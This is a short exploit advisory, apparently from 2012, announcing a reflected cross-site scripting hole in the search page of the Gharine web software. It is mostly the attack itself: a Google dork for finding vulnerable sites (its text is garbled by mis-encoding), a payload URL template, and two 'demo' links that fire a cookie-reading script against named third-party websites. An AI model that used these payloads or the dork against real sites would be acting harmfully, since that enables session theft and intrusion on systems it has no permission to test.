Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28278
HistoryJul 11, 2012 - 12:00 a.m.

Gharine Cross Site Scripting Vulnerabilitiy

2012-07-1100:00:00
vulners.com
19

########################################################################################

Exploit Title : Gharine Cross Site Scripting Vulnerabilitiy

Author : Iranian Security & Research Team

Discovered By : zilli0o0n

Home : sec-lab.ir

Contact : research [at] sec-lab [dot] ir

Software Link : http://www.gharine.com/

Security Risk : high

DorK : "ШСЗНн УЗнК: ЗСКИЗШ ЮСнде"

########################################################################################

Expl0iTs:

http://target.com/search.asp?m=notexists&text=[xss]

Dem0 :

ofoqco.com/search.asp?m=notexists&text=<script>alert(document.cookie)</script>

teimourzadeh.com/search.asp?m=notexists&text=<script>alert(document.cookie)</script>

########################################################################################

We are : K0242 | Nafsh | Ehram.shahmohamadi

Greetz : All sec-lab researchers

########################################################################################